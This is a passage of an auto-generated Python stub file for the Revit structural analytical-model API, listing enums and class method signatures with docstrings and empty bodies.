AnalyticalAlignmentMethod, values: AutoDetect (0), ManuallyAdjusted (2), Projection (1), Varies (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AutoDetect = None ManuallyAdjusted = None Projection = None value__ = None Varies = None class AnalyticalConsistencyChecking(object): """ Utilities that allow for detection of incorrect or incomplete analytical consistency. """ @staticmethod def CheckAnalyticalConsistency(document): """ CheckAnalyticalConsistency(document: Document) -> bool Checks consistency of the Analytical Model. document: Document in which to perform consistency checks. Returns: True if run succeeded, false otherwise. """ pass __all__ = [ 'CheckAnalyticalConsistency', ] class AnalyticalCurveSelector(Enum, IComparable, IFormattable, IConvertible): """ Specifies which portion of an Analytical Curve is of interest. enum AnalyticalCurveSelector, values: EndPoint (1), StartPoint (0), WholeCurve (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass EndPoint = None StartPoint = None value__ = None WholeCurve = None class AnalyticalCurveType(Enum, IComparable, IFormattable, IConvertible): """ Identifies what type of Analytical Model curves should be extracted. enum AnalyticalCurveType, values: ActiveCurves (3), AllRigidLinks (6), ApproximatedCurves (4), BaseCurve (5), RawCurves (0), RigidLinkHead (1), RigidLinkTail (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ActiveCurves = None AllRigidLinks = None ApproximatedCurves = None BaseCurve = None RawCurves = None RigidLinkHead = None RigidLinkTail = None value__ = None class AnalyticalDirection(Enum, IComparable, IFormattable, IConvertible): """ Specifies a direction for manipulating analytical model. enum AnalyticalDirection, values: Any (6), Horizontal (3), HorizontalEnd (5), HorizontalStart (4), Vertical (0), VerticalBottom (2), VerticalTop (1), X (7), Y (8), Z (9) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Any = None Horizontal = None HorizontalEnd = None HorizontalStart = None value__ = None Vertical = None VerticalBottom = None VerticalTop = None X = None Y = None Z = None class AnalyticalElementSelector(Enum, IComparable, IFormattable, IConvertible): """ Specifies a portion of an Analytical Element or the whole element. enum AnalyticalElementSelector, values: EndOrTop (1), StartOrBase (0), Whole (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass EndOrTop = None StartOrBase = None value__ = None Whole = None class AnalyticalFixityState(Enum, IComparable, IFormattable, IConvertible): """ Specifies the fixity setting of individual degrees of freedom in analytical release conditions. enum AnalyticalFixityState, values: Fixed (0), Released (1), Spring (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Fixed = None Released = None Spring = None value__ = None class AnalyticalLink(Element, IDisposable): """ An analytical link element that is used to create connections between other AnalyticalModel elements. """ @staticmethod def Create(doc, type, startHubId, endHubId): """ Create(doc: Document, type: ElementId, startHubId: ElementId, endHubId: ElementId) -> AnalyticalLink Creates a new instance of a AnalyticalLink element between two Hubs. doc: Document to which new AnalyticalLink should be added. type: AnalyticalLinkType for the new AnalyticalLink. startHubId: Hub at start of AnalyticalLink. endHubId: Hub at end of AnalyticalLink. Returns: The newly created AnalyticalLink instance. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsAutoGenerated(self): """ IsAutoGenerated(self: AnalyticalLink) -> bool Specifies whether or not an AnalyticalLink was created by an AnalyticalModel element. Returns: True if AnalyticalLink was created by an AnalyticalModel element, false otherwise. """ pass @staticmethod def IsValidHub(doc, hubId): """ IsValidHub(doc: Document, hubId: ElementId) -> bool Checks whether input hub is valid for an AnalyticalLink. doc: Hubs's document. hubId: Hub to test for validity. Returns: True is returned when provided hubId points hub that is valid for AnalyticalLink, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass End = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The point at the end of the AnalyticalLink. Get: End(self: AnalyticalLink) -> XYZ """ EndHubId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hub ID at end of AnalyticalLink. Get: EndHubId(self: AnalyticalLink) -> ElementId """ OwnerId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """ElementId of AnalyticalModel element which created the AnalyticalLink (if any) invalidElementId if this Analytical Link was created by the User or API Get: OwnerId(self: AnalyticalLink) -> ElementId """ Start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The point at the start of the AnalyticalLink. Get: Start(self: AnalyticalLink) -> XYZ """ StartHubId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hub ID at start of AnalyticalLink. Get: StartHubId(self: AnalyticalLink) -> ElementId """ class AnalyticalLinkType(ElementType, IDisposable): """ An object that specifies the analysis properties for an AnalyticalLink element. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def IsValidAnalyticalFixityState(fixityState): """ IsValidAnalyticalFixityState(fixityState: AnalyticalFixityState) -> bool Returns whether the input fixity state is valid for Analytical Link Type parameters. fixityState: The fixity state value to check. Returns: True if valid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass RotationX = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around X. Get: RotationX(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationX(self: AnalyticalLinkType) = value """ RotationY = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around Y. Get: RotationY(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationY(self: AnalyticalLinkType) = value """ RotationZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around Z. Get: RotationZ(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationZ(self: AnalyticalLinkType) = value """ TranslationX = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along X. Get: TranslationX(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationX(self: AnalyticalLinkType) = value """ TranslationY = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along Y. Get: TranslationY(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationY(self: AnalyticalLinkType) = value """ TranslationZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along Z. Get: TranslationZ(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationZ(self: AnalyticalLinkType) = value """ class AnalyticalLoopType(Enum, IComparable, IFormattable, IConvertible): """ Specifies kind of analytical model loop. enum AnalyticalLoopType, values: All (0), External (1), Filled (3), Internal (2), Void (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass All = None External = None Filled = None Internal = None value__ = None Void = None class AnalyticalModel(Element, IDisposable): """ AnalyticalModel represents the Analytical Model portion of a given Structural Element. """ def Approximate(self, enableApproximation): """ Approximate(self: AnalyticalModel, enableApproximation: bool) Switches between non-approximated (e.g., Curved) Analytical Models and approximated (made up of lines only) Analytical Models enableApproximation: Enable/disable approximated function. """ pass def CanApproximate(self): """ CanApproximate(self: AnalyticalModel) -> bool Indicates if Analytical Model can be approximated or not. Returns: True if Analytical Model can be approximated; false otherwise. """ pass def CanDisableAutoDetect(self, direction): """ CanDisableAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Indicates if Analytical Auto-detect can be disabled programmatically direction: Direction in which to test whether Analytical Auto-detect can be disabled Returns: True if Analytical Auto-detect can be disabled, false otherwise """ pass def CanHaveRigidLinks(self): """ CanHaveRigidLinks(self: AnalyticalModel) -> bool Indicates if Analytical Model supports Rigid Links. Returns: True if Analytical Model supports Rigid Links; false otherwise. """ pass def CanUseHardPoints(self): """ CanUseHardPoints(self: AnalyticalModel) -> bool Indicates if Analytical Model can use Hard Points. Returns: True if Analytical Model can use Hard Points, false otherwise. """ pass def CloneAdjustment(self, source, end): """ CloneAdjustment(self: AnalyticalModel, source: AnalyticalModel, end: int) The method clones the adjustment of one end of the AM on another AM, with respect to the one of the ends. One of the Analytical Model ends """ pass def Disconnect(self, selector): """ Disconnect(self: AnalyticalModel, selector: AnalyticalElementSelector) Unjoin from Hub Element. selector: End of the analytical model. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def Enable(self, enable): """ Enable(self: AnalyticalModel, enable: bool) Enables or disables Analytical Model, if the Element allows a one-operation Analytical Model toggle. enable: Enable (true) or disable (false) Analytical Model. """ pass def EnableAutoDetect(self, direction, enabled): """ EnableAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection, enabled: bool) Enable or disable Analytical Auto-detect. direction: Direction in which to enable Analytical Auto-detect enabled: Turn Analytical Auto-detect on (true) or off (false) """ pass def GetAnalyticalModelSketchComponents(self): """ GetAnalyticalModelSketchComponents(self: AnalyticalModel) -> IList[AnalyticalModelSketchComponent] Retrieves a collection of AnalyticalModelSketchComponent objects, which are useful for those Analytical Models that have finer calibration below the Element level. Returns: If the Analytical Model supports Sketch-based adjustment of the Analytical Model, then this will return an array of AnalyticalModelSketchComponents. Otherwise, it will return an empty array. """ pass def GetAnalyticalModelSupports(self): """ GetAnalyticalModelSupports(self: AnalyticalModel) -> IList[AnalyticalModelSupport] Retrieves the AnalyticalModelSupport array, which is useful to extract Analytical Support Information from Elements. Returns: Array of AnalyticalModelSupport objects, each one representing a support. """ pass def GetAnalyzeAs(self): """ GetAnalyzeAs(self: AnalyticalModel) -> AnalyzeAs Returns value of Analyze As parameter for Analytical Model. Returns: AnalyzeAs enumeration, indicating how Analytical Model is analyzed. """ pass def GetApproximationDeviation(self): """ GetApproximationDeviation(self: AnalyticalModel) -> float Retrieves amount by which approximation is made. Returns: Maximum distance from approximated line to curve. If approximation does not make sense, then this will be 0.0. """ pass def GetAutoDetectMatchedElements(self, direction): """ GetAutoDetectMatchedElements(self: AnalyticalModel, direction: AnalyticalDirection) -> ICollection[ElementId] Retrieves other Element Ids that this Element is Auto-detecting against. direction: Direction in which Analytical Auto-detect is being done. Returns: A set of Element Ids against which this Element is Auto-detecting. The set may be empty if this Element is not Auto-detecting against anything. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: AnalyticalModel) -> Curve Returns the single curve of the Analytical Model, if it is only one curve. Returns: Single curve of the Analytical Model. """ pass def GetCurves(self, curveType): """ GetCurves(self: AnalyticalModel, curveType: AnalyticalCurveType) -> IList[Curve] Retrieves all curves for the Analytical Model of a given type. curveType: Which curve type should be returned. Returns: An array of curves representing analytical model. """ pass def GetElementId(self): """ GetElementId(self: AnalyticalModel) -> ElementId Retrieves Element Id of the structural element corresponding to the Analytical Model. Returns: Element Id for a structural element. """ pass def GetLocalCoordinateSystem(self): """ GetLocalCoordinateSystem(self: AnalyticalModel) -> Transform Gets the local coordinate system (LCS) for an analytical model element. Returns: Transformation matrix. Returns ll for analytical model elements that do not have local coordinate system. Origin returned by transform is point for which local coordinate system was calculated. """ pass def GetManualAdjustmentMatchedElements(self): """ GetManualAdjustmentMatchedElements(self: AnalyticalModel) -> ICollection[ElementId] Retrieves other Element Ids against which the Analytical Model has been adjusted. Returns: Set of Element Ids, representing those Elements against which the Analytical Model has been adjusted. The set may be empty if Analytical Model is not participating in locked Manual Analytical Adjustment. """ pass def GetOffset(self, selector): """ GetOffset(self: AnalyticalModel, selector: AnalyticalElementSelector) -> XYZ Gets the offset of the analytical model at end. selector: End of the analytical model. Returns: Offset of analytical model from base analytical model at the given end. """ pass def GetPoint(self): """ GetPoint(self: AnalyticalModel) -> XYZ Retrieves point of the Analytical Model. Returns: Point of the Analytical Model. """ pass def GetReference(self, selector): """ GetReference(self: AnalyticalModel, selector: AnalyticalModelSelector) -> Reference Returns a reference to a given curve within the analytical model. selector: Specifies where in the analytical model the reference lies. Returns: Requested reference. """ pass def GetRigidLink(self, selector): """ GetRigidLink(self: AnalyticalModel, selector: AnalyticalModelSelector) -> Curve Returns rigid link curve corresponding to selector. selector: Identifies from which end of the analytical model to get the Rigid Link. Returns: Rigid link satisfying selector. """ pass def HasDeletedLinks(self): """ HasDeletedLinks(self: AnalyticalModel) -> bool Indicates if Analytical Model contains deleted Analytical Links. Returns: True if contains, false otherwise. """ pass def HasRigidLinksWith(self, neighborId): """ HasRigidLinksWith(self: AnalyticalModel, neighborId: ElementId) -> bool Indicates if Analytical Model has Rigid Links with specified element. neighborId: neighboring Element, to which Rigid Links may exist. Returns: true if Rigid Links exist, false otherwise. """ pass def IsAnalyzeAsValid(self, analyzeAs): """ IsAnalyzeAsValid(self: AnalyticalModel, analyzeAs: AnalyzeAs) -> bool Determines if the given Analyze As parameter is valid for this Element. analyzeAs: Indicates how Analytical Model is analyzed. Returns: True if valid; false otherwise. """ pass def IsApproximated(self): """ IsApproximated(self: AnalyticalModel) -> bool Indicates if Analytical Model is approximated or not. Returns: True if the Analytical Model is approximated, false otherwise. False if approximation is meaningless for Analytical Model. """ pass def IsAutoDetectEnabled(self, direction): """ IsAutoDetectEnabled(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Reports if Analytical Auto-detect for the given direction is enabled. direction: Direction in which Auto-detect behavior may be enabled. Returns: True if enabled in the given direction, false otherwise. """ pass def IsElementFullySupported(self): """ IsElementFullySupported(self: AnalyticalModel) -> bool Indicates if Analytical Model is fully supported. Returns: True if Analytical Model is fully supported, false otherwise. """ pass def IsEnabled(self): """ IsEnabled(self: AnalyticalModel) -> bool Reports whether the Analytical Model is enabled or disabled. Returns: True if Analytical Model is enabled, false otherwise. """ pass def IsManuallyAdjusted(self): """ IsManuallyAdjusted(self: AnalyticalModel) -> bool Indicates if the Analytical Model has been manually adjusted by the user. Returns: True if user has manually adjusted the Analytical Model; false otherwise. """ pass def IsModified(self): """ IsModified(self: AnalyticalModel) -> bool Checks if AM has been adjusted from auto-detect at any end. """ pass def IsSingleCurve(self): """ IsSingleCurve(self: AnalyticalModel) -> bool Indicates if the Analytical Model can be expressed as a single curve. Returns: True if Analytical Model can be expressed as a single curve, false otherwise. """ pass def IsSinglePoint(self): """ IsSinglePoint(self: AnalyticalModel) -> bool Indicates if the Analytical Model can be expressed as a single point. Returns: True if Analytical Model can be expressed as a single point, false otherwise. """ pass def IsValidDirectionForAutoDetect(self, direction): """ IsValidDirectionForAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Tests if the supplied direction is valid for Analytical Auto-detect. direction: Direction in which Auto-detect behavior may be valid. Returns: True if direction is valid, false otherwise. """ pass def IsValidForManualAdjustment(self, reference): """ IsValidForManualAdjustment(self: AnalyticalModel, reference: Reference) -> bool Indicates if the identified reference is acceptable for Manual Analytical Adjustment. reference: Reference that will be examined. Returns: True if reference can be used, false otherwise. """ pass def IsValidManualAdjustmentSource(self, source, adjustmentDirection): """ IsValidManualAdjustmentSource(self: AnalyticalModel, source: Reference, adjustmentDirection: AnalyticalDirection) -> bool Indicates if the identified reference is acceptable as a source for Manual Analytical Adjustment. source: Reference to be examined. adjustmentDirection: Direction in which adjustment will occur. Returns: True if reference can be used as source; false otherwise. """ pass def IsValidManualAdjustmentTarget(self, target, source, direction): """ IsValidManualAdjustmentTarget(self: AnalyticalModel, target: Reference, source: Reference, direction: AnalyticalDirection) -> bool Indicates if reference is acceptable as a "Target" for Manual Analytical Adjustment. target: Target reference. source: Source reference. This is necessary to avoid illegal conditions. For instance if Element A is manually adjusted against Element B, Element B cannot in general be adjusted against Element A. direction: Direction in which source Element can be adjusted against target Element. Returns: True if reference can be used, false otherwise. """ pass def IsValidRigidLinksOption(self, rigidLinksOption): """ IsValidRigidLinksOption(self: AnalyticalModel, rigidLinksOption: AnalyticalRigidLinksOption) -> bool Indicates if Rigid Links option is valid for the Analytical Model. rigidLinksOption: Rigid Links option to validate. Returns: True if option is valid, false otherwise. """ pass def IsValidSelector(self, selector): """ IsValidSelector(self: AnalyticalModel, selector: AnalyticalModelSelector) -> bool Indicates if the input selector is valid for the Analytical Model. selector: Portion of the analytical model geometry. Returns: True if selector is valid for this Analytical Model, false otherwise. """ pass def ManuallyAdjust(self, source, target): """ ManuallyAdjust(self: AnalyticalModel, source: Reference, target: Reference) -> bool Perform Manual Analytical Adjustment on analytical model, with respect to another Element source: Which part of Analytical Model needs to change. target: Which part of another Analytical Model change should be made against. Returns: Indicates the successful completion of the Manual Analytical Adjustment operation. True if source Element was adjusted successfully, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def ResetLinks(self): """ ResetLinks(self: AnalyticalModel) The function is trying to recreate analytical link elements that were deleted by the user. """ pass def ResetManualAdjustment(self): """ ResetManualAdjustment(self: AnalyticalModel) -> bool Resets all manual adjustments performed by the user onto the Analytical Model. Returns: Indicates the successful reset of all manual adjustment. True if reset succeeds, false otherwise. """ pass def SetAnalyzeAs(self, analyzeAs): """ SetAnalyzeAs(self: AnalyticalModel, analyzeAs: AnalyzeAs) Sets value of Analyze As parameter for this Element. analyzeAs: Indicates how Analytical Model is analyzed . """ pass def SetApproximationDeviation(self, deviation): """ SetApproximationDeviation(self: AnalyticalModel, deviation: float) Adjusts the amount by which approximation is made. deviation: Maximum distance from line to actual curve """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetOffset(self, selector, offset): """ SetOffset(self: AnalyticalModel, selector: AnalyticalElementSelector, offset: XYZ) Sets the offset of the analytical model at end. selector: End of analytical model to offset. offset: New offset for end of analytical model. """ pass def SetUsesHardPoints(self, hardPoints): """ SetUsesHardPoints(self: AnalyticalModel, hardPoints: bool) Sets Hard Points for the Analytical Model. hardPoints: Enable/disable Hard Points (true = enable). """ pass def SupportsManualAdjustment(self): """ SupportsManualAdjustment(self: AnalyticalModel) -> bool Indicates if the Element supports Manual Analytical Adjustment. Returns: True if Manual Adjustment is possible, false otherwise. """ pass def UsesHardPoints(self): """ UsesHardPoints(self: AnalyticalModel) -> bool Indicates if the Analytical Model is using Hard Points during approximation. Returns: True if Hard Points are being used, false otherwise. False if Hard Points are meaningless for Analytical Model. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass RigidLinksOption = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if parameters indicate if Rigid Links should be formed. Get: RigidLinksOption(self: AnalyticalModel) -> AnalyticalRigidLinksOption Set: RigidLinksOption(self: AnalyticalModel) = value """ class AnalyticalModelStick(AnalyticalModel, IDisposable): """ An element that represents a stick in the structural analytical model. Could be one of beam, brace or column type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAlignmentMethod(self, selector): """ GetAlignmentMethod(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> AnalyticalAlignmentMethod Gets the alignment method for a given selector. selector: End of the analytical model. Returns: The alignment method at a given end. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetLocalCoordinateSystem(self, *__args): """ GetLocalCoordinateSystem(self: AnalyticalModelStick, point: XYZ) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified point. point: The point on the analytical model stick element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. GetLocalCoordinateSystem(self: AnalyticalModelStick, parameter: float) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified parameter value along a curve. parameter: The parameter value along a curve that should be in the range [0, 1], where 0 represents start and 1 represents end of the element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. """ pass def GetMemberForces(self): """ GetMemberForces(self: AnalyticalModelStick) -> IList[MemberForces] Gets the member forces associated with this element. Returns: Returns a collection of Member Forces associated with this element. Empty collection will be returned if element doesn't have any Member Forces. To find out with which end member forces are associated use Autodesk::Revit::DB::Structure::MemberForces::Position property to obtain a position of Member Forces on element. """ pass def GetProjectionPlaneY(self, selector): """ GetProjectionPlaneY(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> ElementId Retrieves analytical model projection information for Y direction. selector: End of the analytical model. Returns: Plane on to which analytical model is projected, or invalidElementId if not projected to a Plane. """ pass def GetProjectionPlaneZ(self, selector): """ GetProjectionPlaneZ(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> ElementId Retrieves analytical model projection information for Z direction. selector: End of the analytical model. Returns: Plane on to which analytical model is projected, or invalidElementId if not projected to a Plane. """ pass def GetProjectionY(self, selector): """ GetProjectionY(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> StickElementProjectionY Retrieves analytical model projection information for Y direction. selector: End of the analytical model. Returns: Indicates if the projection is a preset value, or refers to a Plane. """ pass def GetProjectionZ(self, selector): """ GetProjectionZ(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> StickElementProjectionZ Retrieves analytical model projection information for Z direction. selector: End of the analytical model. Returns: Indicates if the projection is a preset value, or refers to a Plane. """ pass def GetReleases(self, start, fx, fy, fz, mx, my, mz): """ GetReleases(self: AnalyticalModelStick, start: bool) -> (bool, bool, bool, bool, bool, bool) Gets the releases of element. start: The position on analytical model stick element. True for start, false for end. """ pass def GetReleaseType(self, start): """ GetReleaseType(self: AnalyticalModelStick, start: bool) -> ReleaseType Gets the release type. start: The position on analytical model stick element. True for start, false for end. Returns: The type of release. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveAllMemberForces(self): """ RemoveAllMemberForces(self: AnalyticalModelStick) -> bool Removes all member forces associated with element. Returns: True if any member forces were removed, false otherwise. """ pass def RemoveMemberForces(self, start): """ RemoveMemberForces(self: AnalyticalModelStick, start: bool) -> bool Removes member forces defined for given position. start: Member Forces position on analytical model stick element. True for start, false for end. Returns: True if member forces for provided position were removed, false otherwise. """ pass def SetAlignmentMethod(self, selector, method): """ SetAlignmentMethod(self: AnalyticalModelStick, selector: AnalyticalElementSelector, method: AnalyticalAlignmentMethod) Sets the alignment method for a given selector. selector: End of the analytical model. method: The alignment method at a given end. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetMemberForces(self, *__args): """ SetMemberForces(self: AnalyticalModelStick, start: bool, force: XYZ, moment: XYZ) Adds Member Forces to element. start: Member Forces position on analytical model stick element. True for start, false for end. force: The translational forces at specified position of the element. The x value of XYZ object represents force along x-axis of the analytical model coordinate system, y along y-axis, z along z-axis respectively. moment: The rotational forces at specified position of the element. The x value of XYZ object represents moment about x-axis of the analytical model coordinate system, y about y-axis, z about z-axis respectively. SetMemberForces(self: AnalyticalModelStick, memberForces: MemberForces) Sets Member Forces to element. memberForces: End to which member forces will be added is defined by setting Autodesk::Revit::DB::Structure::MemberForces::Position property in provided Member Forces object. """ pass def SetProjection(self, selector, *__args): """ SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, planeIdY: ElementId, projectionZ: StickElementProjectionZ) Sets the analytical model projection to a preset value. selector: End of the analytical model. planeIdY: Plane on to which analytical model may be projected in Y direction. Plane identifies a Level, a Grid, or a Ref Plane. projectionZ: Preset value for Analytical Model Stick projection Z. SetProjection(self: 